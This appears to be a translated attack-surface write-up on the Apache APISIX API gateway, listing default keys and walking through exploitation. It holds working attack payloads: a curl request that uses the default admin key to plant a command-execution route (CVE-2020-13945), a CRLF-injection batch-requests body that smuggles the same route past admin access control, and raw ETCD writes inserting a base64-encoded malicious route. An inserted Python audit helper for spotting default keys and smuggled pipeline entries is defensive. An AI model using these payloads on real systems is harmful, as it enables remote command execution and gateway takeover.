
Introduction to APISIX

Introduction

APISIX is a high-performance API gateway that provides rich traffic-management features such as load balancing, dynamic upstreams, canary releases, circuit breaking, authentication and observability. It can handle both north-south and east-west traffic. It listens on port 9080, and its architecture is based on Nginx + Lua:

  • Lua implements the gateway's logic
  • ETCD serves as the data store
  • APISIX exposes an Admin REST API

It exposes a large number of HTTP endpoints without any access control and ships with a default Admin Key. The common attack points are:

  1. The default Admin Key
  2. HTTP endpoints of default plugins (restricted SSRF in batch-requests)
  3. The Admin REST API is susceptible to SSRF
  4. ETCD is susceptible to SSRF
  5. A plugin that can execute Lua code is provided
  6. Dashboard default password admin:admin

Default adminKey: edd1c9f034335f136f87ad84b625c8f1; the other default key is the viewerKey: 4054f7cf07e344346cd3f287985e76a2

Path for identifying APISIX

/apisix/dashboard

Attack methods

1. Exploiting the Admin key

Use the default AdminKey to add a malicious route and execute commands:

curl -i http://127.0.0.1:9080/apisix/admin/routes/114514  \
-H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
"uri": "/404.html",
"plugins": {
"serverless-pre-function": {
"phase": "rewrite",
"functions" : ["return function() ngx.say(io.popen(ngx.unescape_uri(ngx.var.arg_cmd)):read(\\\"*a\\\")) ngx.exit(ngx.HTTP_OK); end"]
}
}
}'

This is itself a very common exploitation scenario: using the default API key to create malicious routes on APISIX (CVE-2020-13945).

2. SSRF in the batch-requests plugin

The Apache APISIX batch-requests plugin lets a client request paths on the Apache APISIX instance itself, within the current Nginx context:

local data, err = core.json.decode(req_body)
-- ...
local httpc = http.new()
httpc:set_timeout(data.timeout)
-- the sub-requests are sent back to this same APISIX instance over loopback
local ok, err = httpc:connect("127.0.0.1", ngx.var.server_port)
if not ok then
  return 500, {error_msg = "connect to apisix failed: " .. err}
end
-- ...
-- the client-supplied pipeline entries become pipelined HTTP requests
local responses, err = httpc:request_pipeline(data.pipeline)

The requests are sent to the Apache APISIX instance itself, so they bypass the access control APISIX applies to /apisix/admin. The pipeline parameter is defined as follows:

pipeline = {
    type = "array",
    minItems = 1,
    items = {
        type = "object",
        properties = {
            version = {
                description = "HTTP version",
                type = "number",
                enum = {1.0, 1.1},
                default = 1.1,
            },
            method = method_schema,
            path = {
                type = "string",
                minLength = 1,
            },
            query = {
                description = "request query string",
                type = "object",
            },
            headers = {
                description = "request header",
                type = "object",
            },
            ssl_verify = {
                type = "boolean",
                default = false
            },
        }
    }
}

Is there in fact a CRLF injection here?

POST /apisix/batch-requests HTTP/1.1
Host: 127.0.0.1:9080
Content-Length: 448

{"pipeline":[{"path":"/apisix/admin/routes/114514","method":"PUT","headers":{"Content-Length":"203\r\nX-Real-IP:127.0.0.1\r\nX-API-KEY:edd1c9f034335f136f87ad84b625c8f1\r\n\r\n{\"uri\":\"/pwn.html\",\"plugins\":{\"serverless-pre-function\":{\"phase\":\"rewrite\",\"functions\":[\"return function() ngx.say(io.popen(ngx.unescape_uri(ngx.var.arg_cmd)):read(\\\"*a\\\")) ngx.exit(ngx.HTTP_OK);end\"]}}}GET /aa HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"}}]}
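The following Python audit helpers are added here and are not part of the original post or of APISIX itself. They cover the two issues above: flagging the default admin/viewer keys listed in the introduction, and inspecting a batch-requests body for pipeline entries that reach the Admin API or carry CR/LF in header or query values (the CRLF injection shown above). The sample body and the REPLACE_ME key are constructed.

```python
import json
import re

# Default keys APISIX ships with (listed earlier on this page); a deployment
# still using one of them should be treated as effectively unauthenticated.
DEFAULT_KEYS = {
    "edd1c9f034335f136f87ad84b625c8f1": "default admin key",
    "4054f7cf07e344346cd3f287985e76a2": "default viewer key",
}

CTRL_CHARS = re.compile(r"[\r\n\x00]")


def flag_default_keys(configured_keys):
    """Return (key, description) for every configured key that is a known default."""
    return [(k, DEFAULT_KEYS[k]) for k in configured_keys if k in DEFAULT_KEYS]


def audit_batch_request(body: str) -> list:
    """Inspect one batch-requests JSON body and return a list of findings.

    Flags pipeline entries whose path reaches /apisix/admin (the plugin re-sends
    them over loopback, so an admin IP allow-list sees 127.0.0.1) and header or
    query names/values containing CR, LF or NUL, which can split the pipelined
    request the plugin builds.
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError as exc:
        return [f"invalid JSON: {exc}"]
    if not isinstance(data, dict):
        return ["body is not a JSON object"]
    findings = []
    for i, item in enumerate(data.get("pipeline") or []):
        path = str(item.get("path", ""))
        if path.startswith("/apisix/admin"):
            findings.append(f"pipeline[{i}]: path reaches the Admin API ({path})")
        for section in ("headers", "query"):
            for name, value in (item.get(section) or {}).items():
                if CTRL_CHARS.search(str(name)) or CTRL_CHARS.search(str(value)):
                    findings.append(f"pipeline[{i}]: control characters in {section} {name!r}")
    return findings


# Constructed sample: one smuggling-style entry (placeholder key), one ordinary entry.
SAMPLE_BODY = json.dumps({"pipeline": [
    {"path": "/apisix/admin/routes/1", "method": "PUT",
     "headers": {"Content-Length": "0\r\nX-API-KEY: REPLACE_ME\r\n\r\n"}},
    {"path": "/hello", "method": "GET", "headers": {"Host": "example.com"}},
]})
```

Running the audit on SAMPLE_BODY yields two findings for the first entry and none for the second; the same check can be applied to a logged request body or placed in front of the plugin as a request filter.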

3. Exploiting ETCD

  • ETCD is unauthenticated and reachable from the internet
  • ETCD is unauthenticated and another SSRF vulnerability exists

The goal is to control the contents of ETCD and add a route containing malicious code directly into ETCD.

$ # list routes
$ curl -i http://127.0.0.1:2379/v3/kv/range -d '{"key":"L2FwaXNpeC9yb3V0ZXM=","range_end":"L2FwaXNpeC9yb3V0ZXQ="}'
HTTP/1.1 200 OK
Access-Control-Allow-Headers: accept, content-type, authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Date: Thu, 01 Jul 2021 10:38:55 GMT
Content-Length: 247

{"header":{"cluster_id":"14841639068965178418","member_id":"10276657743932975437","revision":"1882",
"raft_term":"3"},"kvs":[{"key":"L2FwaXNpeC9yb3V0ZXMv","create_revision":"7","mod_revision":"27",
"version":"3","value":"aW5pdF9kaXI="}],"count":"1"}
$ # add routes
$ curl -i http://127.0.0.1:2379/v3/kv/put -d '{"key":"L2FwaXNpeC9yb3V0ZXMvMTE0NTE0","value":"eyJ1cGRhdGVfdGltZSI6MTYyNTExOTA0MywicHJpb3JpdHkiOjAsImNyZWF0ZV90aW1lIjoxNjI1MDQxNTgzLCJwbHVnaW5zIjp7InNlcnZlcmxlc3MtcHJlLWZ1bmN0aW9uIjp7InBoYXNlIjoicmV3cml0ZSIsImZ1bmN0aW9ucyI6WyJyZXR1cm4gZnVuY3Rpb24oKSBuZ3guc2F5KGlvLnBvcGVuKG5neC51bmVzY2FwZV91cmkobmd4LnZhci5hcmdfY21kKSk6cmVhZChcIiphXCIpKSBuZ3guZXhpdChuZ3guSFRUUF9PSyk7ZW5kIl19fSwic3RhdHVzIjoxLCJpZCI6IjExNDUxNCIsInVyaSI6IlwvcHduLmh0bWwifQ=="}'
HTTP/1.1 200 OK
Access-Control-Allow-Headers: accept, content-type, authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Date: Thu, 01 Jul 2021 10:41:42 GMT
Content-Length: 117

{"header":{"cluster_id":"14841639068965178418","member_id":"10276657743932975437","revision":"1886",
"raft_term":"3"}}

References

https://ricterz.me/posts/2021-07-05-apache-apisix-attack-surface-research.txt
